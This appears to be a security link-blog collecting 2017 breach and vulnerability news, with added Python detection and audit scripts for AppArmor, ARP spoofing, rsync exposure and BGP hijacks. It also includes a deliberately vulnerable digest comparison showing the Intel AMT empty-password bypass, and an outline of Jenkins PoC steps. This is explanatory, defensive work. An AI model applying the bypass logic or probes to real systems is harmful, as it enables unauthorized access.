Malicious Subtitles Threaten Kodi, VLC and Popcorn Time Users

Millions of people risk having their devices and systems compromised by malicious subtitles, Check Point researchers revealed today. The threat comes from a previously undocumented vulnerability which affects users of popular streaming software, including Kodi, Popcorn-Time, and VLC. Developers of the applications have already applied fixes or will do so soon.
[…]
By conducting attacks through subtitles, hackers can take complete control over any device running them. From this point on, the attacker can do whatever he wants with the victim’s machine, whether it is a PC, a smart TV, or a mobile device,

Source: Malicious Subtitles Threaten Kodi, VLC and Popcorn Time Users, Researchers Warn – TorrentFreak

Ubuntu: Guest session processes are not confined in 16.10

Processes launched under a lightdm guest session are not confined by the /usr/lib/lightdm/lightdm-guest-session AppArmor profile in Ubuntu 16.10, Ubuntu 17.04, and Ubuntu Artful (current dev release). The processes are unconfined.

The simple test case is to log into a guest session, launch a terminal with ctrl-alt-t, and run the following command:

$ cat /proc/self/attr/current

Expected output, as seen in Ubuntu 16.04 LTS, is:

/usr/lib/lightdm/lightdm-guest-session (enforce)

Running the command inside of an Ubuntu 16.10 and newer guest session results in:

unconfined

Source: Bug #1663157 “Guest session processes are not confined in 16.10 …” : Bugs : lightdm package : Ubuntu
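The bug report's test is manual: open a terminal inside the guest session and read one file. The script below is an added example (not from the bug report or from lightdm) that does the same check for every process a user owns, so you can see at a glance whether anything in a guest session is running outside the profile. The two label strings are copied from the report; the profile path is the one the report names, and everything else is assumption.

```python
import os
from typing import List, Optional, Tuple

# Labels as /proc/<pid>/attr/current shows them on Ubuntu 16.04 (confined) and
# on 16.10+ with this bug (unconfined). Taken from the bug report, not read live.
EXPECTED_GUEST_LABEL = "/usr/lib/lightdm/lightdm-guest-session (enforce)"
BROKEN_GUEST_LABEL = "unconfined"
GUEST_PROFILE = "/usr/lib/lightdm/lightdm-guest-session"


def parse_label(label: str) -> Tuple[str, Optional[str]]:
    """Split an AppArmor label into (profile, mode).

    '/usr/lib/lightdm/lightdm-guest-session (enforce)' -> (profile, 'enforce')
    'unconfined'                                        -> ('unconfined', None)
    The kernel terminates the attribute with a newline (sometimes a NUL); strip both.
    """
    label = label.strip("\x00\n ")
    if label.endswith(")") and " (" in label:
        profile, mode = label.rsplit(" (", 1)
        return profile, mode[:-1]
    return label, None


def is_enforced(label: str, expected_profile: Optional[str] = None) -> bool:
    """True only when the process runs under a profile in enforce mode (and, if
    given, under the expected profile). Complain mode does not count: it logs
    violations but does not block them."""
    profile, mode = parse_label(label)
    if profile == "unconfined" or mode != "enforce":
        return False
    return expected_profile is None or profile == expected_profile


def process_label(pid: int) -> Optional[str]:
    """Read the live label; None if the process is gone or no LSM exposes the file."""
    try:
        with open(f"/proc/{pid}/attr/current", "rb") as fh:
            return fh.read().decode("utf-8", errors="replace")
    except OSError:
        return None


def unenforced_processes(uid: int, expected_profile: str) -> List[Tuple[int, str]]:
    """(pid, label) for every process owned by `uid` that is NOT enforced under
    `expected_profile`. For a working lightdm guest session this list is empty;
    with the 16.10 bug every process shows up as 'unconfined'."""
    hits: List[Tuple[int, str]] = []
    for entry in os.listdir("/proc"):
        if not entry.isdigit():
            continue
        pid = int(entry)
        try:
            if os.stat(f"/proc/{pid}").st_uid != uid:
                continue
        except OSError:
            continue  # process exited while we were scanning
        label = process_label(pid)
        if label is not None and not is_enforced(label, expected_profile):
            hits.append((pid, label.strip()))
    return hits


if __name__ == "__main__":
    # Run this from a terminal inside the guest session (ctrl-alt-t, as the report says).
    me = process_label(os.getpid())
    print("this process:", me.strip() if me else "<no label>")
    for pid, label in unenforced_processes(os.getuid(), GUEST_PROFILE):
        print(f"pid {pid}: {label}")
```

Run outside a guest session it will list your own processes, which is expected: they are not meant to be under the guest profile. The point is what it prints from inside a guest session on 16.10 and later.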

Huge Trove of Confidential Medical Records Discovered on Unsecured Server Accessible to Anyone

At least tens of thousands, if not millions of medical records of New York patients were until recently readily accessible online to just about anyone who knew how to look.

Patient demographic information, social security numbers, records of medical diagnoses and treatments, along with a plethora of other highly-sensitive records were left completely undefended by a medical IT company based in Louisville, Kentucky. The files, which belong to at least tens of thousands of patients, originate from Bronx-Lebanon Hospital Center in New York.

In a statement provided to Gizmodo—and published by NBC News Wednesday night—Bronx Lebanon said that a server containing its patients’ data had been the “target of an unauthorized hack by a third party,” attributing that assessment to the hospital’s vendor, iHealth Solutions. The hospital added that iHealth had taken immediate steps to protect the data, and that both parties were “cooperating fully with law enforcement agents.” iHealth Solutions did not respond to request for comment.

However, according to Kromtech Security Center, a German security software development firm, the leak was not the result of a malicious hacker infiltrating the Bronx Lebanon server. Instead, the firm’s analysis showed that the data was left unprotected on a backup storage device, without a password, accessible to anyone online. It also appears likely that the data was not protected by an active firewall, exposing an untold number of patients to crimes such as identity theft and blackmail.
[…]
In March, Kromtech reported that more than 400,000 audio recordings of telemarketing calls had been exposed online, including many in which customers provided sensitive information, such as credit card details. A month before, the researchers helped secure the personal data of nearly 25,000 California sheet metal workers. Before that, it was a Missouri sheriff’s office, which had inadvertently leaked audio recordings of police informants of victims involved in crimes as serious as child molestation.

Source: Huge Trove of Confidential Medical Records Discovered on Unsecured Server Accessible to Anyone

Secure rsync, people!

‘Accidental Hero’ Finds Kill Switch To Stop Wana Decrypt0r Ransomware

“An ‘accidental hero’ has halted the global spread of the WannaCry ransomware that has wreaked havoc on organizations…” writes The Guardian. An anonymous reader quotes their report:
A cybersecurity researcher tweeting as @malwaretechblog, with the help of Darien Huss from security firm Proofpoint, found and implemented a “kill switch” in the malicious software that was based on a cyber-weapon stolen from the NSA. The kill switch was hardcoded into the malware in case the creator wanted to stop it from spreading. This involved a very long nonsensical domain name that the malware makes a request to — just as if it was looking up any website — and if the request comes back and shows that the domain is live, the kill switch takes effect and the malware stops spreading. Of course, this relies on the creator of the malware registering the specific domain. In this case, the creator failed to do this. And @malwaretechblog did early Friday morning (Pacific Time), stopping the rapid proliferation of the ransomware.

You can read their first-person account of the discovery here, which insists that registering the domain “was not a whim. My job is to look for ways we can track and potentially stop botnets…” Friday they also tweeted a map from the New York Times showing that registering that domain provided more time for U.S. sites to patch their systems. And Friday night they added “IP addresses from our [DNS] sinkhole have been sent to FBI and ShadowServer so affected organizations should get a notification soon. Patch ASAP.”

UPDATE: Slashdot reader Lauren Weinstein says some antivirus services (and firewalls incorporating their rules) are mistakenly blocking that site as a ‘bad domain’, which allows the malware to continue spreading. “Your systems MUST be able to access the domain above if this malware blocking trigger is to be effective, according to the current reports that I’m receiving!”

Source: Slashdot

Keylogger Found in Audio Driver of HP Laptops

The audio driver installed on some HP laptops includes a feature that could best be described as a keylogger, which records all the user’s keystrokes and saves the information to a local file, accessible to anyone or any third-party software or malware that knows where to look.

Swiss cyber-security firm modzero discovered the keylogger on April 28 and made its findings public today.
Keylogger found in preinstalled audio driver

According to researchers, the keylogger feature was discovered in the Conexant HD Audio Driver Package version 1.0.0.46 and earlier.

This is an audio driver that is preinstalled on HP laptops. One of the files of this audio driver is MicTray64.exe (C:\windows\system32\mictray64.exe).

This file is registered to start via a Scheduled Task every time the user logs into his computer. According to modzero researchers, the file “monitors all keystrokes made by the user to capture and react to functions such as microphone mute/unmute keys/hotkeys.”

This behavior, by itself, is not a problem, as many other apps work this way. The problem is that this file writes all keystrokes to a local file at:

C:\users\public\MicTray.log

Audio driver also exposes keystrokes in real-time via local API

If the file doesn’t exist or a registry key containing this file’s path does not exist or was corrupted, the audio driver will pass all keystrokes to a local API, named the OutputDebugString API.

Source: Keylogger Found in Audio Driver of HP Laptops

Avast blocks the entire internet – again

“Non tech savvy users will have issues reporting or getting the problem fixed,” he explained. “To regain web access you have to disable Web Shield or disable Avast or uninstall Avast. To fix the issue you have to do a clean install of the latest version of software.”

It’s unclear how widespread the problem is. Avast’s PR reps have acknowledged our requests for comment but are yet to supply a substantive response.

All HTTP requests are blocked from all applications including Windows Update. “TCP connections are established but no HTTP request is sent,” according to Michael S.

Source: Avast blocks the entire internet – again

Macron defeats Russian hackers and puts leakers at a disadvantage

Emmanuel Macron’s digital team responded to cyberattacks with a “cyber-blurring” strategy that involved fake email accounts loaded with false documents.
[…]
“We created false accounts, with false content, as traps. We did this massively, to create the obligation for them to verify, to determine whether it was a real account,” Mr. Mahjoubi said. “I don’t think we prevented them. We just slowed them down,” he said. “Even if it made them lose one minute, we’re happy,” he said.
[…]
But he did note that in the mishmash that constituted the Friday dump, there were some authentic documents, some phony documents of the hackers’ own manufacture, some stolen documents from various companies, and some false emails created by the campaign.

Source: Hackers Came, but the French Were Prepared

What this does, which is more important, is put the onus on the leakers / hackers to verify the contents of their data, which is a big deal, as this is hard to do and time consuming. As soon as doubt is seeded about the authenticity of even one document in a leaked trove, the whole trove loses much of its value.

Well this is awkward. As Microsoft was bragging about Office at Build, Office 365 went down

TITSUP: Total Inability To Stand Up Products

Loads of people reported that, at around 1245 PT, access to the service went out. Microsoft confirmed shortly after it was having problems, and said it was looking into the matter. Subscribers in New York, Denver, Texas, and Portland, in the US, were, for example, unable to access the service.

We are investigating a problem affecting access to Office 365, and we will post an update as soon as we have more info.
— Office 365 Status (@Office365Status) May 10, 2017

Monitoring site Downdetector was crammed with reports of outages from both coasts of the US and major cities as users reported the cloud-connected Office service to be inaccessible.
[…]
we notice they tweeted that as of 1338 PT, sign-in issues are being resolved

Source: Well this is awkward. As Microsoft was bragging about Office at Build, Office 365 went down

The problem with the Cloud

Debenhams Flowers shoppers stung by bank card-stealing tech pest

Malware has infected backend systems used by Brit high street chain Debenhams – and swiped 26,000 people’s personal information in the process.

The cyber-break-in targeted the online portal for the retailer’s florist arm, Debenhams Flowers. Miscreants had access to the internal systems at Ecomnova, the biz that runs the Debenhams Flowers business, for more than six weeks.

Customer payment details, names and addresses from between February 24 and April 11 were all potentially exposed as a result of the breach, reports ex-Register vulture Alex J Martin, who just flew off to Sky News. Affected customers have all reportedly been notified.

El Reg asked Debenhams for confirmation of the scope of the breach but we’re yet to hear back at the time of writing.

Security tech slingers said the snafu shows how brands can be exposed through the infosec shortcomings of third-party suppliers.

“The hackers allegedly gained access to site operator Ecomnova’s systems using malicious software to access customers’ personal and financial information,” said Dr Jamie Graves, chief exec at ZoneFox. “The Debenhams hack is a key reminder to businesses that the third-party vendors you partner with should be properly vetted to ensure they have secure systems in place.”

Source: Debenhams Flowers shoppers stung by bank card-stealing tech pest

Intel chip remote auth fail worse than thought – authentication doesn’t work at all!

A remote hijacking flaw that lurked in Intel chips for seven years was more severe than many people imagined, because it allowed hackers to remotely gain administrative control over huge fleets of computers without entering a password. This is according to technical analyses published Friday… AMT makes it possible to log into a computer and exercise the same control enjoyed by administrators with physical access [and] was set up to require a password before it could be remotely accessed over a Web browser interface. But, remarkably, that authentication mechanism can be bypassed by entering any text string — or no text at all…

“Authentication still worked” even when the wrong hash was entered, Tenable Director of Reverse Engineering Carlos Perez wrote. “We had discovered a complete bypass of the authentication scheme.” A separate technical analysis from Embedi, the security firm Intel credited with first disclosing the vulnerability, arrived at the same conclusion… Making matters worse, unauthorized accesses typically aren’t logged by the PC because AMT has direct access to the computer’s network hardware… The packets bypass the OS completely.

Slashdot
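The phrase "any text string, or no text at all" describes a specific bug class: the Tenable and Embedi write-ups traced the bypass to a comparison that checks only as many bytes of the expected digest as the client supplied, so an empty response compares zero bytes and passes. The snippet below is an added Python stand-in for that logic, not Intel's firmware code; the username, realm, URI and password are placeholders. It computes the HTTP Digest response the AMT web interface expects and shows the broken comparison next to the correct one.

```python
import hashlib
import hmac
import secrets


def _md5(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def digest_response(username: str, realm: str, password: str,
                    method: str, uri: str, nonce: str) -> str:
    """HTTP Digest response (RFC 2617, no qop), the scheme AMT's web UI uses.
    The server derives the same value from its stored credential and the
    nonce it issued, then must compare it with what the client sent."""
    ha1 = _md5(f"{username}:{realm}:{password}")
    ha2 = _md5(f"{method}:{uri}")
    return _md5(f"{ha1}:{nonce}:{ha2}")


def vulnerable_compare(expected: str, supplied: str) -> bool:
    """Length taken from the attacker: only len(supplied) characters are
    checked, as with strncmp(expected, supplied, strlen(supplied)).
    An empty response compares zero bytes and always 'matches'; so does any
    prefix of the real hash."""
    return expected[:len(supplied)] == supplied


def fixed_compare(expected: str, supplied: str) -> bool:
    """Require the full expected length, then compare in constant time."""
    return len(supplied) == len(expected) and hmac.compare_digest(expected, supplied)


def authenticate(compare, stored_password: str, supplied_response: str, nonce: str,
                 username: str = "admin", realm: str = "Digest:0123456789ABCDEF",
                 method: str = "GET", uri: str = "/index.htm") -> bool:
    """Server-side decision, parameterised on the comparison function so both
    behaviours can be exercised. Credentials, realm and URI are placeholders."""
    expected = digest_response(username, realm, stored_password, method, uri, nonce)
    return compare(expected, supplied_response)


if __name__ == "__main__":
    nonce = secrets.token_hex(16)
    for name, cmp in (("vulnerable", vulnerable_compare), ("fixed", fixed_compare)):
        print(f"{name:10s} empty response accepted: {authenticate(cmp, 'P@ssw0rd', '', nonce)}")
```

The second half of the page's point, that the traffic never reaches the OS, is why this cannot be caught with host logging: the fix has to be the firmware update (or disabling AMT/ISM/SBT and filtering ports 16992-16995 at the network edge until it is applied).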

WikiLeaks Reveals CIA Man-in-the-Middle LAN Hacking Tool Archimedes

WikiLeaks isn’t done exposing the CIA’s arsenal of hacking tools used to infiltrate computer systems around the globe. Last month, we told you about Weeping Angel, which targeted select Samsung Smart TVs for surveillance purposes. Today, we’re learning about Archimedes, which attacks computers attached to a Local Area Network (LAN).

Although we have no way of knowing whether Archimedes is still in use by the CIA, the details of how it is unleashed on unsuspecting parties have been revealed in full. In its teaser announcing the exploit, WikiLeaks writes, “It allows the re-directing of traffic from the target computer inside the LAN through a computer infected with this malware and controlled by the CIA.
[…]
Fulcrum uses ARP spoofing to get in the middle of the target machine and the default gateway on the LAN so that it can monitor all traffic leaving the target machine. It is important to note that Fulcrum only establishes itself in the middle on one side of the two­-way communication channel between the target machine and the default gateway. Once Fulcrum is in the middle, it forwards all requests from the target machine to the real gateway.

Archimedes can be deployed on machines running Windows XP (32-bit), Windows Vista (64-bit) and Windows 7 (64-bit) operating systems. The CIA documentation also says that the binaries required for Archimedes/Fulcrum will “run on any reasonably modern x86-compatible hardware”.

Source: WikiLeaks Reveals CIA Man-in-the-Middle LAN Hacking Tool Archimedes
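The one detail in the excerpt worth turning into detection logic is that Fulcrum poisons only one direction: it makes the target believe the attacker's MAC is the gateway, and leaves the gateway's view of the target alone. So the evidence lives on the target's own link, as ARP replies that rebind the gateway IP to a new MAC. The code below is an added example, not from the WikiLeaks documents or the tool itself; the capture is constructed from documentation address ranges (RFC 5737 IPs, RFC 7042 MACs).

```python
from dataclasses import dataclass
from typing import Dict, List, Optional, Set


@dataclass(frozen=True)
class ArpReply:
    """One ARP 'is-at' packet as a sniffer on the target would see it."""
    ts: float
    sender_ip: str
    sender_mac: str


# Constructed sample capture, not real traffic: the gateway 192.0.2.1 answers
# from its own NIC, then a second host starts claiming the same IP.
SAMPLE_CAPTURE = [
    ArpReply(0.0, "192.0.2.1", "00:00:5e:00:53:01"),
    ArpReply(1.5, "192.0.2.1", "00:00:5e:00:53:01"),
    ArpReply(2.0, "192.0.2.7", "00:00:5e:00:53:07"),
    ArpReply(4.2, "192.0.2.1", "00:00:5e:00:53:42"),   # poison: same IP, new MAC
    ArpReply(4.7, "192.0.2.1", "00:00:5e:00:53:42"),   # attackers re-send to keep the cache poisoned
    ArpReply(5.2, "192.0.2.1", "00:00:5e:00:53:42"),
]


def detect_gateway_spoof(replies: List[ArpReply], gateway_ip: str,
                         known_gateway_mac: Optional[str] = None) -> List[str]:
    """Alert on every reply that binds the gateway IP to a MAC other than the
    trusted one. Prefer a configured MAC; otherwise the first sighting is
    trusted (weaker: an attacker who is already poisoning when you start
    looking wins). Each poison reply is reported because the attacker must
    keep re-sending them to stay in the path."""
    trusted = known_gateway_mac.lower() if known_gateway_mac else None
    alerts: List[str] = []
    for r in replies:
        if r.sender_ip != gateway_ip:
            continue
        mac = r.sender_mac.lower()
        if trusted is None:
            trusted = mac
            continue
        if mac != trusted:
            alerts.append(f"t={r.ts:.1f}s gateway {gateway_ip} claimed by {mac}, trusted {trusted}")
    return alerts


def conflicting_bindings(replies: List[ArpReply]) -> Dict[str, Set[str]]:
    """Broader sweep: every IP that has been claimed by more than one MAC.
    Catches poisoning of hosts other than the gateway, at the cost of noise
    from legitimate IP moves (DHCP churn, failover)."""
    seen: Dict[str, Set[str]] = {}
    for r in replies:
        seen.setdefault(r.sender_ip, set()).add(r.sender_mac.lower())
    return {ip: macs for ip, macs in seen.items() if len(macs) > 1}


if __name__ == "__main__":
    for line in detect_gateway_spoof(SAMPLE_CAPTURE, "192.0.2.1"):
        print(line)
    print(conflicting_bindings(SAMPLE_CAPTURE))
```

On a real host, feed it from a sniffer (tcpdump's `arp reply` output, or scapy) and pin the gateway MAC from inventory rather than learning it, or simply set a static ARP entry for the gateway on hosts that matter: a static entry is what makes this class of tool fail.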

Leaked: The UK’s secret blueprint with telcos for mass spying on internet, phones – and backdoors

The UK government has secretly drawn up more details of its new bulk surveillance powers – awarding itself the ability to monitor Brits’ live communications, and insert encryption backdoors by the backdoor.

In its draft technical capability notices paper [PDF], all communications companies – including phone networks and ISPs – will be obliged to provide real-time access to the full content of any named individual within one working day, as well as any “secondary data” relating to that person.

That includes encrypted content – which means that UK organizations will not be allowed to introduce true end-to-end encryption of their users’ data but will be legally required to introduce a backdoor to their systems so the authorities can read any and all communications.
[…]
This act of stripping away safeguards on people’s private data is also fantastic news for hackers, criminals, and anyone else who wants to snoop on Brits. The seals are finally coming off.

“This lays bare the extreme mass surveillance this Conservative government is planning after the election,” Liberal Democrat President Sal Brinton told us in a statement.

“It is a full frontal assault on civil liberties and people’s privacy. The security services need to be able to keep people safe. But these disproportionate powers are straight out of an Orwellian nightmare and have no place in a democratic society.”

Source: Leaked: The UK’s secret blueprint with telcos for mass spying on internet, phones – and backdoors

After years of warnings, mobile network hackers exploit SS7 flaws to drain bank accounts via MitM attacks

Experts have been warning for years about security blunders in the Signaling System 7 protocol – the magic glue used by cellphone networks to communicate with each other.

These shortcomings can be potentially abused to, for example, redirect people’s calls and text messages to miscreants’ devices. Now we’ve seen the first case of crooks exploiting the design flaws to line their pockets with victims’ cash.

O2-Telefonica in Germany has confirmed to Süddeutsche Zeitung that some of its customers have had their bank accounts drained using a two-stage attack that exploits SS7.

In other words, thieves exploited SS7 to intercept two-factor authentication codes sent to online banking customers, allowing them to empty their accounts. The thefts occurred over the past few months, according to multiple sources.

Source: After years of warnings, mobile network hackers exploit SS7 flaws to drain bank accounts

FuturePets.com database of thousands of credit cards was left exposed for months

A US online pet store has exposed the details of more than 110,400 credit cards used to make purchases through its website, researchers have found.

In a stunning show of poor security, the Austin, Texas-based company FuturePets.com exposed its entire customer database, including names, postal and email addresses, phone numbers, credit card information, and plain-text passwords.
[…]
The database was exposed because of the company’s own insecure server and use of “rsync,” a common protocol used for synchronizing copies of files between two different computers, which wasn’t protected with a password.

Source: A database of thousands of credit cards was left exposed for months

Oh dear, clear text passwords and non-protected rsync transfers 🙁
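Both the Bronx-Lebanon backup device above and this FuturePets server come down to the same thing: an rsync daemon reachable from the internet with no module authentication. The script below is an added example, not from either incident report or from the rsync project, that parses an rsyncd.conf and flags the settings that produce exactly that exposure. The configuration it reads is constructed: `[backup]` is the shape of the two leaks, `[backup_ok]` is the same module hardened. (The better answer is to not expose the daemon at all and run rsync over SSH; where the daemon must stay, these are the minimum settings.)

```python
import re
from typing import Dict, List

# Constructed rsyncd.conf for illustration. Note that module settings inherit
# the global ones, so 'uid = root' and 'use chroot = no' apply to [backup].
SAMPLE_RSYNCD_CONF = """
uid = root
gid = root
use chroot = no
max connections = 10

[backup]
    path = /srv/backup
    comment = nightly dumps
    read only = no

[backup_ok]
    path = /srv/backup
    read only = yes
    use chroot = yes
    uid = rsync
    gid = rsync
    auth users = backupuser
    secrets file = /etc/rsyncd.secrets
    hosts allow = 10.0.0.0/24
    hosts deny = *
"""


def parse_rsyncd_conf(text: str) -> Dict[str, Dict[str, str]]:
    """Return {module: {key: value}}, with global settings merged into every
    module unless the module overrides them (rsyncd.conf semantics)."""
    sections: Dict[str, Dict[str, str]] = {"": {}}
    current = ""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        header = re.match(r"^\[(.+)\]$", line)
        if header:
            current = header.group(1).strip()
            sections[current] = {}
            continue
        if "=" in line:
            key, val = line.split("=", 1)
            sections[current][key.strip().lower()] = val.strip()
    global_opts = sections.pop("")
    return {name: {**global_opts, **opts} for name, opts in sections.items()}


def _is_off(val: str) -> bool:
    return val.strip().lower() in ("no", "false", "0")


def audit_module(opts: Dict[str, str]) -> List[str]:
    """Findings for one module. Defaults follow rsyncd.conf(5): read only and
    use chroot default to yes, uid defaults to nobody."""
    findings: List[str] = []
    if "auth users" not in opts:
        findings.append("no 'auth users': anyone who can reach the port can use the module")
    elif "secrets file" not in opts:
        findings.append("'auth users' set but no 'secrets file' to check them against")
    if "hosts allow" not in opts:
        findings.append("no 'hosts allow': not restricted to known client addresses")
    if _is_off(opts.get("read only", "yes")):
        findings.append("'read only = no': remote side can overwrite the backups")
    if _is_off(opts.get("use chroot", "yes")):
        findings.append("'use chroot = no': path traversal out of the module is possible")
    if opts.get("uid", "nobody").lower() in ("root", "0"):
        findings.append("'uid = root': the daemon serves files with root privileges")
    return findings


def audit_config(text: str) -> Dict[str, List[str]]:
    return {name: audit_module(opts) for name, opts in parse_rsyncd_conf(text).items()}


if __name__ == "__main__":
    for module, findings in audit_config(SAMPLE_RSYNCD_CONF).items():
        print(f"[{module}]", "OK" if not findings else "")
        for f in findings:
            print("   -", f)
```

A quick external check for the condition the scanners found is `rsync rsync://HOST/` against your own address space: an anonymous module listing coming back is the problem.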

Yes, your WhatsApp messages can be read by the London police

Bruce66423 brings word that a terrorist’s WhatsApp message has been decrypted “using techniques that ‘cannot be disclosed for security reasons’, though ‘sources said they now have the technical expertise to repeat the process in future.'” The Economic Times reports:
U.K. security services have managed to decode the last message sent out by Khalid Masood before he rammed his high-speed car into pedestrians on Westminster Bridge and stabbed to death a police officer at the gates of Parliament on March 22. The access to Masood’s message was achieved by what has been described by security sources as a use of “human and technical intelligence”…

Slashdot

Russian-controlled telecom hijacks financial services’ Internet traffic

On Wednesday, large chunks of network traffic belonging to MasterCard, Visa, and more than two dozen other financial services companies were briefly routed through a Russian government-controlled telecom under unexplained circumstances that renew lingering questions about the trust and reliability of some of the most sensitive Internet communications.

Anomalies in the border gateway protocol—which routes large-scale amounts of traffic among Internet backbones, ISPs, and other large networks—are common and usually the result of human error. While it’s possible Wednesday’s five- to seven-minute hijack of 36 large network blocks may also have been inadvertent, the high concentration of technology and financial services companies affected made the incident “curious” to engineers at network monitoring service BGPmon. What’s more, the way some of the affected networks were redirected indicated their underlying prefixes had been manually inserted into BGP tables, most likely by someone at Rostelecom, the Russian government-controlled telecom that improperly announced ownership of the blocks.
“Quite suspicious”

“I would classify this as quite suspicious,” Doug Madory, director of Internet analysis at network management firm Dyn, told Ars. “Typically accidental leaks appear more voluminous and indiscriminate. This would appear to be targeted to financial institutions. A typical cause of these errors [is] in some sort of internal traffic engineering, but it would seem strange that someone would limit their traffic engineering to mostly financial networks.”

Source: Russian-controlled telecom hijacks financial services’ Internet traffic
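What BGPmon and Dyn noticed boils down to one check: a prefix, or a more specific of it, appeared with an origin AS that is not the one on record. The code below is an added example of that check, not BGPmon's or Dyn's tooling, run over a constructed feed. Prefixes and ASNs are documentation ranges (RFC 5737, RFC 5398), and the origin table stands in for what RPKI ROAs provide in production.

```python
import ipaddress
from typing import Dict, List, Optional, Tuple

# Who is allowed to originate our prefixes. Constructed; in production this is
# the ROA set or an IRR-derived table.
EXPECTED_ORIGINS: Dict[str, int] = {
    "192.0.2.0/24": 64496,     # say, a card network
    "198.51.100.0/24": 64497,  # say, a bank
    "203.0.113.0/24": 64498,   # say, a hosting provider
}

# Announcements as a route collector would show them: (prefix, AS path).
# The origin is the last AS in the path.
SAMPLE_UPDATES: List[Tuple[str, List[int]]] = [
    ("192.0.2.0/24",    [64500, 64499, 64496]),  # legitimate
    ("198.51.100.0/24", [64500, 64497]),         # legitimate
    ("192.0.2.0/24",    [64500, 64511]),         # same prefix, wrong origin
    ("198.51.100.0/25", [64500, 64511]),         # more specific from the wrong origin
    ("203.0.113.0/25",  [64500, 64498]),         # more specific from the right origin: fine
    ("198.18.0.0/15",   [64500, 64511]),         # not in our table, ignored
]


def classify(prefix: str, as_path: List[int],
             expected: Dict[str, int] = EXPECTED_ORIGINS) -> Optional[str]:
    """Alert text if the announcement conflicts with the recorded origin of one
    of our prefixes, else None. A more specific matters even more than an
    exact-match hijack: longest-prefix-match means it wins in every router's
    table regardless of AS path length."""
    net = ipaddress.ip_network(prefix, strict=False)
    origin = as_path[-1]
    for ours, good_origin in expected.items():
        ours_net = ipaddress.ip_network(ours)
        if net.version != ours_net.version:
            continue
        if net == ours_net:
            if origin != good_origin:
                return f"ORIGIN HIJACK {prefix}: announced by AS{origin}, expected AS{good_origin}"
            return None
        if net.subnet_of(ours_net):
            if origin != good_origin:
                return (f"MORE-SPECIFIC HIJACK {prefix} (inside {ours}): "
                        f"announced by AS{origin}, expected AS{good_origin}")
            return None
    return None


def audit(updates: List[Tuple[str, List[int]]],
          expected: Dict[str, int] = EXPECTED_ORIGINS) -> List[str]:
    """Run classify() over a feed and keep only the alerts, in feed order."""
    alerts: List[str] = []
    for prefix, path in updates:
        verdict = classify(prefix, path, expected)
        if verdict:
            alerts.append(verdict)
    return alerts


if __name__ == "__main__":
    for line in audit(SAMPLE_UPDATES):
        print(line)
```

The "targeted" observation in the article is a second-order check this does not do: counting how many of the flagged prefixes belong to one sector. That is an analyst's judgement, but it starts from a list like the one this produces.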

Jenkins admin? Get buzzy patching, says Cloudbees

The bug, CVE-2017-1000353, exists in how Jenkins implements HTTP upload/download requests.

The bug lets an attacker exploit a serialised object in the preamble of commands sent to the CLI. As described by Securiteam, “since Jenkins does not validate the serialised object, any serialise[d] object can be sent.”

The attacker can use the channel to send SignedObject to the CLI. Jenkins deserialises it using a new ObjectInputStream, which the company says bypasses its blacklist-based protection mechanism.

To block it, Cloudbees has added SignedObject to its blacklist.

To test the vulnerability for yourself, the bug report suggests the following:

Create a serialised object whose payload is a command executed by running the payload.jar script;
Change the Python script jenkins_poc1.py to adjust the target target URL, and open your payload file.

Source: Jenkins admin? Get buzzy patching, says Cloudbees

Remote security exploit in all 2008+ Intel platforms – SemiAccurate

The short version is that every Intel platform with AMT, ISM, and SBT from Nehalem in 2008 to Kaby Lake in 2017 has a remotely exploitable security hole in the ME (Management Engine) not CPU firmware. If this isn’t scary enough news, even if your machine doesn’t have AMT, ISM, or SBT provisioned, it is still vulnerable, just not over the network. For the moment. From what SemiAccurate gathers, there is literally no Intel box made in the last 9+ years that isn’t at risk. This is somewhere between nightmarish and apocalyptic.

First a little bit of background. SemiAccurate has known about this vulnerability for literally years now, it came up in research we were doing on hardware backdoors over five years ago. What we found was scary on a level that literally kept us up at night. For obvious reasons we couldn’t publish what we found out but we took every opportunity to beg anyone who could even tangentially influence the right people to do something about this security problem. SemiAccurate explained the problem to literally dozens of “right people” to seemingly no avail. We also strongly hinted that it existed at every chance we had.

Various Intel representatives over the years took my words seriously, told me I was crazy, denied that the problem could exist, and even gave SemiAccurate rather farcical technical reasons why their position wasn’t wrong. Or dangerous. In return we smiled politely, argued technically, and sometimes, usually actually, were not so polite about our viewpoint. Unfortunately it all seems to have been for naught.

The problem is quite simple, the ME controls the network ports and has DMA access to the system. It can arbitrarily read and write to any memory or storage on the system, can bypass disk encryption once it is unlocked (and possibly if it has not, SemiAccurate hasn’t been able to 100% verify this capability yet), read and write to the screen, and do all of this completely unlogged. Due to the network access abilities, it can also send whatever it finds out to wherever it wants, encrypted or not.

Source: Remote security exploit in all 2008+ Intel platforms – SemiAccurate

Oh shit.

You can download a detector here from Intel

Netgear says sorry four weeks after losing customer backups on cloud and locally(!!!!) – yes the cloud can hurt you!

Netgear has cocked up its cloud management service, losing data stored locally on ReadyNAS devices’ shared folders worldwide – and customers have complained to The Register about only being informed four weeks later.

This week, the San Jose-based networking business sent an email to customers, seen by The Register, confirming that an “outage” affecting ReadyCLOUD, the free service for its network attached storage offering, caused the storage systems to disconnect from the cloud service and be marked as deleted at the end of March.

Compounding the issue, as part of a clean-up process, Netgear decided that when a ReadyCloud account is marked as closed, the NAS holding that account’s home folder should be deleted along with all of the data it was holding.

As one user complained to The Register: “In practice, accounts are generally deleted from the NAS admin screen by the user and a big warning flashes up to tell you that all data will be deleted. In this case, as the glitch was server side, no warning was presented and loads of people found that their home folders and data had mysteriously been deleted, by the looks of it, at the command of Netgear.”

Source: Netgear says sorry four weeks after losing customer backups

Shadow Brokers release 4 year old NSA hacks for Win2k to Windows 8

The Shadow Brokers have leaked more hacking tools stolen from the NSA’s Equation Group – this time four-year-old exploits that attempt to hijack venerable Windows systems, from Windows 2000 up to Server 2012 and Windows 7 and 8.

The toolkit puts into anyone’s hands – from moronic script kiddies to hardened crims – highly classified nation-state-level weaponry that can potentially compromise and commandeer systems around the world. This is the same powerful toolkit Uncle Sam used once upon a time to hack into and secretly snoop on foreign governments, telcos, banks, and other organizations.

The files range from Microsoft Windows exploits to tools for monitoring SWIFT interbank payments. Ongoing analysis of the leaked documents and executables has revealed Cisco firewalls and VPN gateways are also targets.

Source: Leaked NSA point-and-pwn hack tools menace Win2k to Windows 8

These are actually useful and working tools, as opposed to the last lot.

Smartphone gyros and open background tabs reveal your inputs, even when locked

Cyber experts at Newcastle University, UK, have revealed the ease with which malicious websites, as well as installed apps, can spy on us using just the information from the motion sensors in our mobile phones.

